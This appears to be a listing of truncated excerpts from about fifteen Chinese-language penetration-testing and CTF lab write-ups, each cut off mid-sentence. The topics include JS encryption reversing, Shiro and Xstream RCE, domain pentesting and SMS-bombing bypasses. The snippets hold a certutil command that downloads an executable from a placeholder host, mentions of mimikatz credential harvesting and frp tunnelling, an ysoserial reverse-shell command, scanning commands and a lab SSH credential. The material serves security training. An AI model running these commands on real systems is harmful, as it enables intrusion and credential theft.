简述 在一次实战渗透测试中,使用burp抓包遇到了js加密,通过js逆向找到了加密算法,最终利用mitmdump联动burpsuite实现了自动化加解密 遇到的问题 在得到授权的前提下,心情愉悦地打开burp抓包,进行日常地抓包改包测试,但是测试时发现请求体和响应体均被加密了,且密文都是d1,d2,d3格式,这就难受了≧ ﹏ ≦ js逆向 遇到上面地问题,首先当然是得定位加密函数了,F12打开浏
0# 概述 在前期Web打点成功获得对应权限后,就进入了后渗透(提权、内网渗透、域渗透)的阶段,但是在有些时候,总会出现各种各样奇怪的情况,在此也分享一些经验出来。 最近在打红队外援碰到了一个站点存在SQL注入,于是尝试用SqlMap对网站进行注入,发现注入成功,但由此也引发了一系列问题。 可能你看完本篇文章,会觉得原理其实很简单。但试问你自己,在面对以下情况的时候,能想到通过这样的手法达成你的
春秋云镜—Exchange flag1 入口:39.99.157.194 fscan扫一下 发现一个存活的8000端口,访问一下 登录界面是个华夏 ERP,有个信息泄露可以泄露用户密码: http://39.98.108.154:8000/user/getAllList;.ico {"code":200,"data":{"userList":[{"id":63,"username":"季圣华
真实案例,厚码见谅,有些步骤可能有些忘记,截图并不是很全面。 金蝶云星空RCE shell之后尝试上线(出网) certutil -urlcache -split -f http://xx.xx.xx.xx/test.exe c:\test.exe 这里exe的位置只是一个示例,正常都是在tmp目录下的 有CS的话,就上传frp 本机信息收集 上传mimikatz收集密码本 mimikatz收集
外网打点 信息搜集 Fscan扫描 漏洞探测 题目描述检测口令安全性,那应该是存在弱口令,所以我们先找下管理员用户,然后进行爆破,我们这里可以发现首页的这个邮箱 明显就是管理员账号,然后导入密码本到bp中进行爆破 得到密码1chris 而后进入后台 发现是Flarum主题,搜索相关漏洞发现https://www.leavesongs.com/PENETRATION/flarum-rce-t
Wonderland 信息收集 nmap+masscan 之后gobuster扫描一下目录 继续gobuster扫描 可以猜测出来目录了 http://10.10.194.98/r/a/b/b/i/t/ 查看源码得到ssh连接的账号密码 alice:HowDothTheLittleCrocodileImproveHisShiningTail 之后SSH连接 漏洞分析 根据导入第三方
外网打点 信息搜集 Fscan扫描一下 发现jsessionid=xxx,明显的Shiro特征,同时发现有acatuator泄露。 漏洞探测 访问网站,弱口令直接登进行了,但是没啥东西 搞搞Shiro漏洞,尝试工具一把梭,寻找下密钥 没找到,呃,总不能是Shiro721吧,但确实此时登录过后,有对应的Cookie,满足爆破的条件了,抱着怀疑的态度进行了爆破。 然后同时想起之前的actuat
信息收集 端口扫描 使用nmap去扫描端口,发现存在大量端口。 端口 53 已开放,并通过 TCP 托管 DNS 服务 – 版本:Simple DNS Plus(目前版本号未知) 端口 88 已打开并托管 kerberos 服务。 端口 135 / 445 已打开,分别托管 RPC / SMB 共享服务。 端口 389 / 3268 已打开并托管 LDAP 服务。 端口 593 已开放并通过 H
春秋云镜-Time flag01 首先拿到ip进行端口扫描 ./fscan64.exe -h 39.99.237.59 -p 1-65535 发现这些端口存活,访问 一些 Neo4j漏洞利用GitHub - zwjjustdoit/CVE-2021-34371.jar: CVE-2021-34371.jar java -jar .\rhino_gadget.jar rmi://39.99.
外网打点 信息搜集 FTP匿名登录 发现有FTP匿名登录,连接查看 将两个文件下载至本地,查看 漏洞探测 搜索Xstream漏洞,发现 https://www.cnblogs.com/thelostworld/p/14810682.html 尝试CVE-2021-29505 反弹shell java -cp ysoserial.jar ysoserial.exploit.JRMPListen
域渗透学习 [TOC] 在渗透测试过程中,我们经常会遇到以下场景:某处于域中的服务器通过路由做端口映射,对外提供web服务,我们通过web脚本漏洞获得了该主机的system权限,如果甲方有进一步的内网渗透测试需求,以证明企业所面临的巨大风险,这个时候就需要做内网的域渗透。通常,我们是以获得域控制器的权限为目标,因为一旦域控制器沦陷,整个内网就尽在掌握中了。 一、环境配置 在开始之前,需要先配置好⼀
信息收集 端口扫描 首先去探测存在的端口,发现存在53,80,135等端口。 ● 通过 TCP 托管 DNS 服务 - 版本:Microsoft DNS 6.1.7601 (1DB15D39) ● 端口 80 已打开并托管 HTTP 服务器 – Microsoft IIS httpd 10.0 – Egotistical Bank :: 主页 ● 端口 88 已打开并托管 kerberos 服务
分析 要在未修复dex并打包情况下对其app内在类进行hook,单纯的hook会由于加固的问题而导致加载不到内在想hook的类。因此需要进行加载加固的classloader。 在此之前需要先了解Context 在Android中,只有Application、Activity以及Service有自己的Context。 Application的Context 我们知道Application的Cont
前言 短信轰炸漏洞是渗透测试中常见的一类漏洞,也是大家在SRC挖掘过程中常测试的点,网上常规的短信轰炸挖掘技巧也有很多,绕过方式也花样百出,在这里与大家分享一下我在实际渗透中的两例绕过思路。 案例1 在某次项目上发现了一个通过手机验证码进行密码找回的功能点。 数据包如下 正常对一个手机号进行短信轰炸,会提示我们90s内不允许对一个手机号进行重复发送。所以,我在这里通过添加+、空格、\n、逗号进
靶场:春秋-Privilege 外网打点 信息搜集 fscan扫描 发现80和8080端口存在着两个服务,先看下80 Wordpress建站,使用wpscan扫描一下 相关插件漏洞寻找过后,发现并没有RCE,所以换8080端口看看 尝试弱口令未果,搜索相关RCE漏洞,探测未授权访问不存在 接下来再对Wordpress站使用dirsearch进行扫描 漏洞探测 发现源码文件,下载下来后发现